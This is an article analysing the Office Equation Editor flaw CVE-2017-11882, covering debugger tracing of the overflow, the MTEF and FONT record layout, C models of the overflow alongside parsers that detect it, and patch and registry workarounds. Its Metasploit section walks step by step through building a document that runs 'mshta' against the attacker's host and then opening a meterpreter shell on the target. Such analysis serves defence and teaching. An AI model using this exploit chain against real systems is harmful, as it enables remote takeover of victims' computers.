What does Office series vulnerability CVE-2017-11882 mean?

2025-01-19 update. From: SLTechnology News&Howtos, Network Security.

Shulou (Shulou.com) 05/31 report

This article explains in detail what the Office vulnerability CVE-2017-11882 is: how the bug works, how to locate it in a debugger, the data structures involved, how to exploit it with Metasploit, and how to fix it.

I. Brief introduction to the vulnerability

CVE-2017-11882 is a stack buffer overflow in EQNEDT32.EXE, the Equation Editor bundled with Microsoft Office. When the process reads OLE data containing a MathType/Equation object, it copies the formula's font name (the FONT record data) into a fixed-size stack buffer without checking the name's length. An over-long name overwrites the function's saved return address, so an attacker can execute arbitrary code.

On November 14, 2017, Microsoft released its November security update addressing the flaw; all widely used Office versions were affected.

Basic information about the vulnerability

    Vulnerability ID:    CVE-2017-11882
    Vulnerability name:  Microsoft Office Equation Editor memory corruption vulnerability
    Vulnerability type:  remote code execution
    Threat type:         stack overflow
    Affected versions:   Microsoft Office 2000 / 2003 / 2007 SP3 / 2010 SP2 / 2013 SP1 / 2016

II. Vulnerability testing

Test environment: Windows 7 32-bit with Microsoft Office 2013 SP1. The test document is generated with the scripts from https://github.com/Ridter/CVE-2017-11882.

Use the Command_CVE-2017-11882.py script to generate the vulnerability file.

The repository offers two ways to build the document; we test the first, whose payload launches the calculator.

III. Locating the vulnerability

Because the overflowing function lives inside the EQNEDT32.EXE process, we debug and analyse that process. Opening the vulnerability file pops up the calculator, which is usually done through a WinExec call, so we can set a breakpoint on WinExec and then work backwards from there to the overflow point.

First load eqnedt32.exe into OllyDbg and run it (or attach to the process after Office starts it), set a breakpoint on WinExec, then open the vulnerability file test.doc: the breakpoint hits inside WinExec.

Because the exploit works by overwriting a function's return address, we can use the stack (or the calling function) to find the caller of the vulnerable function and continue the analysis one level up.

Set breakpoints before and after the call in the function at 4115A7, reopen the vulnerability file, and step over the call (F8). The first call never returns; the calculator pops up instead. This shows that the overflow happens inside that call: the return address 4115D8 saved on the stack is overwritten, and execution is diverted to the shellcode.

The figure above shows the call to 41160F and the original return address saved on the stack.

When the font name is copied, its length is not checked, so over-long data overflows the buffer and overwrites the function's return address 4115D8.

IDA analysis shows that the local buffer at [ebp+28] is the one that overflows.

The buffer at [ebp+28] is allocated 0x24 bytes; writing past it overflows the frame and overwrites the return address.

After the overflow, the original return address 4115D8 has been replaced by 402114.

The address 402114 written over it holds a RETN instruction, so execution returns there and immediately returns again.

That second RETN pops the next stack slot and lands at 12F350, where the FONT record's name data, that is, the shellcode, is stored.

The shellcode calls WinExec to launch calc.exe.

The calculator pops up successfully.
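To make the mechanism concrete, here is an added C model of the font-name copy, written for this article's readers; it is not code from the page or from EQNEDT32.EXE. The stack frame is modelled as a flat byte array: the 0x24-byte buffer the article describes, then (an assumption) four bytes of saved EBP, then the saved return address 4115D8. The payload string and the 0x90 filler are constructed here; the RETN gadget address 402114 is the value the article reports. The unbounded copy overwrites the return slot, and its NUL terminator supplies the address's high 0x00 byte; the bounded copy refuses the same name.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define FONT_BUF_SIZE 0x24                 /* local buffer size the article reports ([ebp+28])            */
#define RET_SLOT      (FONT_BUF_SIZE + 4)  /* assumed: 4 bytes of saved EBP lie between buffer and return */
#define FRAME_SIZE    (RET_SLOT + 4)
#define ORIG_RET      0x004115D8u          /* return address saved by the caller (from the article)        */
#define RETN_GADGET   0x00402114u          /* address the exploit writes over it (from the article)        */

/* A flat byte array stands in for the stack frame, so the simulated overflow
 * stays inside one C object and the program itself has no undefined behaviour. */
typedef struct { uint8_t bytes[FRAME_SIZE + 64]; } frame_t;

static uint32_t read_le32(const uint8_t *p) {
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}
static void write_le32(uint8_t *p, uint32_t v) {
    p[0] = v & 0xff; p[1] = (v >> 8) & 0xff; p[2] = (v >> 16) & 0xff; p[3] = (v >> 24) & 0xff;
}

void frame_init(frame_t *f) {
    memset(f->bytes, 0, sizeof f->bytes);
    write_le32(&f->bytes[RET_SLOT], ORIG_RET);
}
uint32_t frame_ret(const frame_t *f) { return read_le32(&f->bytes[RET_SLOT]); }

/* Vulnerable copy, as in EQNEDT32.EXE: copies the NUL-terminated name into the
 * 0x24-byte buffer without checking its length. (The sizeof guard only keeps the
 * simulation inside the array; it is not part of the modelled code.) */
size_t copy_font_name_vuln(frame_t *f, const uint8_t *name) {
    size_t i = 0;
    while (name[i] != 0 && i < sizeof f->bytes - 1) {
        f->bytes[i] = name[i];
        i++;
    }
    f->bytes[i] = 0;   /* the terminator is written into the frame as well */
    return i;
}

/* Fixed copy: measure the name against the buffer first and reject it if the
 * name plus its terminator does not fit. */
int copy_font_name_fixed(frame_t *f, const uint8_t *name) {
    size_t len = 0;
    while (len < FONT_BUF_SIZE && name[len] != 0)
        len++;
    if (len >= FONT_BUF_SIZE)
        return -1;
    memcpy(f->bytes, name, len + 1);
    return 0;
}

/* Build a FONT-record name the way the exploit document does: payload bytes,
 * filler up to the return-address slot, then the little-endian gadget address.
 * The address's high byte is 0x00, so it doubles as the string terminator. */
size_t build_malicious_name(uint8_t *out, size_t cap) {
    static const char payload[] = "cmd.exe /c calc.exe";   /* constructed stand-in for the shellcode */
    if (cap < RET_SLOT + 4)
        return 0;
    memset(out, 0x90, RET_SLOT);
    memcpy(out, payload, sizeof payload - 1);
    write_le32(out + RET_SLOT, RETN_GADGET);
    return RET_SLOT + 3;   /* bytes before the terminating 0x00 */
}

/* Scenario 1: the vulnerable copy. Returns what the return slot holds afterwards. */
uint32_t demo_vulnerable_ret(void) {
    uint8_t name[128]; frame_t f;
    build_malicious_name(name, sizeof name);
    frame_init(&f);
    copy_font_name_vuln(&f, name);
    return frame_ret(&f);
}

/* Scenario 2: the fixed copy refuses the name and leaves the return slot intact. */
int demo_fixed_blocks_exploit(void) {
    uint8_t name[128]; frame_t f;
    build_malicious_name(name, sizeof name);
    frame_init(&f);
    return copy_font_name_fixed(&f, name) == -1 && frame_ret(&f) == ORIG_RET;
}

/* Scenario 3: a normal font name passes the fixed copy unchanged. */
int demo_fixed_benign(void) {
    static const uint8_t name[] = "Times New Roman";
    frame_t f;
    frame_init(&f);
    return copy_font_name_fixed(&f, name) == 0
        && memcmp(f.bytes, name, sizeof name) == 0
        && frame_ret(&f) == ORIG_RET;
}

int main(void) {
    printf("vulnerable copy: return slot = 0x%08x (was 0x%08x)\n", demo_vulnerable_ret(), ORIG_RET);
    printf("fixed copy blocks the name: %d\n", demo_fixed_blocks_exploit());
    printf("fixed copy accepts a benign name: %d\n", demo_fixed_benign());
    return 0;
}
```

The distance from the buffer to the return address depends on the real frame layout, which is why the exploit scripts pad the name to a fixed length before the gadget address; the model only needs the two facts the article gives, a 0x24-byte buffer and an unchecked NUL-terminated copy.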

IV. Data structure analysis

EQNEDT32.EXE embeds formulas in Office documents through OLE (Object Linking and Embedding). When a formula is inserted or edited, EQNEDT32.EXE does not run as a child of the Office process (Word, Excel, etc.) but as a separate process, so the protection mechanisms applied to Office processes do not cover it and cannot prevent EQNEDT32.EXE from being exploited. The vulnerability is in how EQNEDT32.EXE processes the byte stream tagged as a font-name record inside the OLE Equation object: if that font name is over-long, the program overflows the stack, because it never checks the string's length while processing it.

The Equation Native stream = EQNOLEFILEHDR + MTEF data, where

MTEF data = MTEF header + MTEF byte stream

The EQNOLEFILEHDR header structure (28 bytes in total) is as follows

    struct EQNOLEFILEHDR {
        WORD  cbHdr;      // header length, fixed at 0x1C
        DWORD version;    // fixed at 0x00020000
        WORD  cf;         // clipboard format of the equation object
        DWORD cbObject;   // length of the MTEF data, excluding this header
        DWORD reserved1;  // undocumented
        DWORD reserved2;  // undocumented
        DWORD reserved3;  // undocumented
        DWORD reserved4;  // undocumented
    };

The corresponding bytes in the test document are shown in the figure.

MTEF header (5 bytes)

    Byte  Description          Value
    0     MTEF version         3
    1     generating platform  0 for Macintosh, 1 for Windows
    2     generating product   0 for MathType, 1 for Equation Editor
    3     product version      3
    4     product subversion   0

MTEF byte stream (record tags)

    Value  Symbol  Description
    0      END     end of MTEF, pile, line, embellishment list, or template
    1      LINE    line (slot) record
    2      CHAR    character record
    3      TMPL    template record
    4      PILE    pile (vertical stack of lines) record
    5      MATRIX  matrix record
    6      EMBELL  character embellishment (e.g. hat, prime) record
    7      RULER   ruler (tab-stop location) record
    8      FONT    font name record
    9      SIZE    general size record
    10     FULL    full size record
    11     SUB     subscript size record
    12     SUB2    sub-subscript size record
    13     SYM     symbol size record
    14     SUBSYM  sub-symbol size record

Reference: http://rtf2latex2e.sourceforge.net/MTEF3.html

Tag value 8 is a FONT record; its structure is as follows:

    struct stuFontRecord {
        BYTE bTag;          // record tag, fixed at 0x08 (FONT)
        BYTE bTypeFace;     // typeface number
        BYTE bStyle;        // font style
        BYTE bFontName[n];  // font name, NULL-terminated
    };

    Field  Value                        Description
    tag    0x08                         1 byte, fixed at 0x08
    tface  typeface number              1 byte, typeface number
    style  1 or 2                       1 byte, 1 for italic, 2 for bold
    name   font name (null-terminated)  font name, ending with NULL

The corresponding bytes in the test document are shown in the figure.
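The structures above can be exercised with a small parser. The following C code is an added example for this article, not code from the page and not Equation Editor's own: it validates the EQNOLEFILEHDR, checks the MTEF header, decodes the first record if it is a FONT record, and measures the font name against the 0x24-byte stack buffer discussed earlier. Only END and FONT records are decoded; any other record type is reported as unsupported rather than guessed at. The stream builder fabricates a minimal Equation Native stream for testing (the cf value and the typeface number are placeholders), which is, in outline, what the generator script used above does with a much longer name.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define EQN_HDR_LEN    0x1C         /* size of EQNOLEFILEHDR                      */
#define EQN_VERSION    0x00020000u
#define MTEF_HDR_LEN   5
#define MTEF_END       0x00
#define MTEF_FONT      0x08
#define FONT_NAME_MAX  0x24         /* the stack buffer the name is copied into   */

typedef struct {
    uint16_t cbHdr;
    uint32_t version;
    uint16_t cf;
    uint32_t cbObject;
} eqn_hdr_t;

typedef struct {
    uint8_t typeface;
    uint8_t style;
    size_t  name_len;     /* bytes before the NUL terminator                  */
    int     terminated;   /* 0 if the data ended before a terminator was seen */
} font_rec_t;

static uint16_t le16(const uint8_t *p) { return (uint16_t)(p[0] | p[1] << 8); }
static uint32_t le32(const uint8_t *p) {
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}
static void put16(uint8_t *p, uint16_t v) { p[0] = v & 0xff; p[1] = (v >> 8) & 0xff; }
static void put32(uint8_t *p, uint32_t v) {
    p[0] = v & 0xff; p[1] = (v >> 8) & 0xff; p[2] = (v >> 16) & 0xff; p[3] = (v >> 24) & 0xff;
}

/* 0 on success; negative if the header is truncated, has the wrong fixed
 * values, or claims more MTEF data than the stream actually carries. */
int parse_eqn_header(const uint8_t *buf, size_t len, eqn_hdr_t *h) {
    if (len < EQN_HDR_LEN) return -1;
    h->cbHdr    = le16(buf);
    h->version  = le32(buf + 2);
    h->cf       = le16(buf + 6);
    h->cbObject = le32(buf + 8);
    if (h->cbHdr != EQN_HDR_LEN || h->version != EQN_VERSION) return -2;
    if (h->cbObject > len - EQN_HDR_LEN) return -3;
    return 0;
}

/* Decode the first record after the MTEF header. Returns 1 with *out filled if
 * it is a FONT record, 0 if it is END, negative on truncation or an undecoded type. */
int find_font_record(const uint8_t *mtef, size_t len, font_rec_t *out) {
    if (len < MTEF_HDR_LEN + 1) return -1;
    if (mtef[0] != 3) return -2;                 /* only MTEF version 3 is described here */
    size_t i = MTEF_HDR_LEN;
    uint8_t tag = mtef[i];
    if (tag == MTEF_END) return 0;
    if (tag != MTEF_FONT) return -3;             /* SIZE, LINE, ... have layouts not decoded here */
    if (i + 3 > len) return -1;
    out->typeface = mtef[i + 1];
    out->style    = mtef[i + 2];
    size_t n = 0;
    while (i + 3 + n < len && mtef[i + 3 + n] != 0) n++;
    out->name_len   = n;
    out->terminated = (i + 3 + n < len);
    return 1;
}

/* 1 if the stream's font name would overflow the 0x24-byte buffer (or has no
 * terminator), 0 if it looks benign, -1 if malformed or not decodable here. */
int check_equation_native(const uint8_t *buf, size_t len) {
    eqn_hdr_t h;
    font_rec_t fr;
    if (parse_eqn_header(buf, len, &h) != 0) return -1;
    int r = find_font_record(buf + EQN_HDR_LEN, h.cbObject, &fr);
    if (r < 0) return -1;
    if (r == 1 && (!fr.terminated || fr.name_len >= FONT_NAME_MAX)) return 1;
    return 0;
}

/* Build a minimal Equation Native stream: EQNOLEFILEHDR, MTEF v3 header, one
 * FONT record carrying `name`, then END. Constructed for testing; cf and the
 * typeface number are placeholders. Returns the total length, 0 if cap is too small. */
size_t build_sample_stream(uint8_t *out, size_t cap, const uint8_t *name, size_t name_len) {
    size_t mtef_len = MTEF_HDR_LEN + 3 + name_len + 1 + 1;
    size_t total = EQN_HDR_LEN + mtef_len;
    if (total > cap) return 0;
    memset(out, 0, EQN_HDR_LEN);                 /* reserved1..4 stay zero */
    put16(out, EQN_HDR_LEN);
    put32(out + 2, EQN_VERSION);
    put16(out + 6, 0xC4C3);                      /* placeholder clipboard-format id */
    put32(out + 8, (uint32_t)mtef_len);
    uint8_t *p = out + EQN_HDR_LEN;
    p[0] = 3; p[1] = 1; p[2] = 1; p[3] = 3; p[4] = 0;   /* MTEF 3, Windows, Equation Editor, 3, 0 */
    p += MTEF_HDR_LEN;
    p[0] = MTEF_FONT; p[1] = 1; p[2] = 1;        /* FONT, typeface 1 (placeholder), italic */
    memcpy(p + 3, name, name_len);
    p[3 + name_len] = 0;                         /* NUL terminator of the font name */
    p[4 + name_len] = MTEF_END;
    return total;
}

/* Build a stream whose font name is `name_len` bytes of 'A' and check it. */
int demo_check(size_t name_len) {
    uint8_t name[256], buf[512];
    if (name_len > sizeof name) return -1;
    memset(name, 'A', name_len);
    size_t n = build_sample_stream(buf, sizeof buf, name, name_len);
    return n ? check_equation_native(buf, n) : -1;
}

/* A stream cut off inside the header must be rejected, not parsed. */
int demo_truncated(void) {
    uint8_t name[16] = "Times", buf[128];
    size_t n = build_sample_stream(buf, sizeof buf, name, 5);
    return n ? check_equation_native(buf, 10) : -2;
}

int main(void) {
    printf("15-byte font name: %d\n", demo_check(15));
    printf("44-byte font name: %d\n", demo_check(44));
    printf("truncated stream: %d\n", demo_truncated());
    return 0;
}
```

A name of 0x23 bytes still fits with its terminator; from 0x24 bytes on the copy described in section III runs past the buffer, which is the threshold the check uses.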

V. Analysis of the RTF structure

The \objupdate control word makes the OLE object update, and therefore load, automatically, which is what triggers the vulnerable code. By default an OLE object in an Office document is only activated when the user double-clicks it; setting the object to update automatically removes that interaction, so the object is activated, and the malicious code runs, as soon as the document is opened.
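An added example of checking for this property, written for this article and not the page's own code: a small C scanner that finds the first {\object ...} group in RTF text, reports whether it carries \objupdate, and extracts the class declared by \objclass. The two RTF snippets are constructed for the test; their \objdata hex is a truncated placeholder, not a real Equation object.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

typedef struct {
    int  has_object;     /* an {\object ...} group was found                     */
    int  auto_update;    /* the group carries \objupdate: activates on open       */
    char objclass[64];   /* value of \objclass inside the group, "" if absent     */
} rtf_obj_info_t;

/* True if control word `cw` (with its backslash) occurs in hay[0..n) and is not
 * merely a prefix of a longer control word. */
static int has_control_word(const char *hay, size_t n, const char *cw) {
    size_t cwlen = strlen(cw);
    for (size_t i = 0; i + cwlen <= n; i++) {
        if (memcmp(hay + i, cw, cwlen) == 0) {
            char next = (i + cwlen < n) ? hay[i + cwlen] : '\0';
            if (!isalnum((unsigned char)next))
                return 1;
        }
    }
    return 0;
}

/* Locate the first \object group and inspect it. Missing or unbalanced braces
 * are reported as "no object" rather than guessed at. */
rtf_obj_info_t scan_rtf_object(const char *rtf) {
    rtf_obj_info_t info;
    memset(&info, 0, sizeof info);

    const char *obj = strstr(rtf, "\\object");
    if (!obj || isalnum((unsigned char)obj[7]))   /* \object, not \objectsomething */
        return info;
    const char *start = obj;
    while (start > rtf && *start != '{') start--;
    if (*start != '{') return info;

    /* Find the matching close brace by depth. */
    int depth = 0;
    const char *end = start;
    for (; *end; end++) {
        if (*end == '{') depth++;
        else if (*end == '}' && --depth == 0) { end++; break; }
    }
    if (depth != 0) return info;
    size_t glen = (size_t)(end - start);

    info.has_object  = 1;
    info.auto_update = has_control_word(start, glen, "\\objupdate");

    /* \objclass is followed by a space, then the class name up to '}' or '\'. */
    static const char cw[] = "\\objclass";
    for (size_t i = 0; i + sizeof cw - 1 < glen; i++) {
        if (memcmp(start + i, cw, sizeof cw - 1) != 0) continue;
        const char *p = start + i + sizeof cw - 1;
        while (p < end && *p == ' ') p++;
        size_t k = 0;
        while (p < end && *p != '}' && *p != '\\' && *p != ' ' && k < sizeof info.objclass - 1)
            info.objclass[k++] = *p++;
        info.objclass[k] = '\0';
        break;
    }
    return info;
}

int rtf_has_object(const char *rtf)   { return scan_rtf_object(rtf).has_object; }
int rtf_auto_updates(const char *rtf) { return scan_rtf_object(rtf).auto_update; }
int rtf_objclass_is(const char *rtf, const char *cls) {
    rtf_obj_info_t i = scan_rtf_object(rtf);
    return i.has_object && strcmp(i.objclass, cls) == 0;
}

/* Constructed samples; the \objdata hex is a truncated placeholder. */
const char SAMPLE_RTF_AUTO[] =
    "{\\rtf1\\ansi\\deff0\n"
    "{\\object\\objemb\\objupdate{\\*\\objclass Equation.3}"
    "{\\*\\objdata 0105000002000000}}\n"
    "}";
const char SAMPLE_RTF_MANUAL[] =
    "{\\rtf1\\ansi\\deff0\n"
    "{\\object\\objemb{\\*\\objclass Equation.3}"
    "{\\*\\objdata 0105000002000000}}\n"
    "}";

int main(void) {
    rtf_obj_info_t a = scan_rtf_object(SAMPLE_RTF_AUTO);
    rtf_obj_info_t m = scan_rtf_object(SAMPLE_RTF_MANUAL);
    printf("auto sample:   class=%s objupdate=%d\n", a.objclass, a.auto_update);
    printf("manual sample: class=%s objupdate=%d\n", m.objclass, m.auto_update);
    return 0;
}
```

An Equation.3 object that also carries \objupdate is the combination this exploit document relies on; an object without \objupdate still needs a double-click, as the paragraph above describes.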

Analysis of the OLE object in the vulnerability file

The inserted equation OLE object is visible.

Viewing the directory structure of the OLE object:

The OLE object contains the Equation Native stream.

Use the olebrowse tool to view the Equation Native stream.

VI. Exploitation with Metasploit

Environment

Target: Windows 7 with Office installed. Attacker: Kali Linux. Metasploit module for this vulnerability: https://github.com/0x09AL/CVE-2017-11882-metasploit

First download the module.

Copy cve_2017_11882.rb to

/usr/share/metasploit-framework/modules/exploits/windows/smb

Then copy cve-2017-11882.rtf to /usr/share/metasploit-framework/data/exploits

Start Metasploit.

Use the search command to find the module for 11882, then load it with use exploit/windows/smb/cve_2017_11882

Run show options to see the parameters that need to be set.

Set a reverse meterpreter payload.

Set the local IP and the URI path.

Run exploit -j to start the module as a background job; the output reports the address and port the handler is listening on.

Generate the document for the target machine with the following command:

python Command109b_CVE-2017-11882.py -c "mshta http://192.168.106.132:8080/test" -o test.doc

Here 192.168.106.132 is the attacker's IP, 8080 the port and test the URI, matching the values set in Metasploit. Once generated, open the document on the target machine.

If it succeeds, meterpreter prints the incoming connection. If it fails, check the parameters first; a mismatch between the document's URL and the module's options is the usual cause.

After success, run sessions -l to list the hosts you control.

Run sessions -i 1 to interact with the session, enter shell, then run cmd and whoami. Done.

VII. Fixing the vulnerability

(1) Download and apply the update from https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882.

(2) Enable Windows Update so the system is updated automatically and regularly.

Workaround: unregister the Equation Editor COM component

(1) Press Win+R and open cmd.exe (as an administrator, since the keys are under HKLM).

(2) Enter the following two commands. The CLSID {0002CE02-0000-0000-C000-000000000046} is the Equation Editor control; a Compatibility Flags value of 0x400 tells Office not to load it. The second command covers 32-bit Office on 64-bit Windows.

reg add "HKLM\SOFTWARE\Microsoft\Office\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400

reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Office\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400
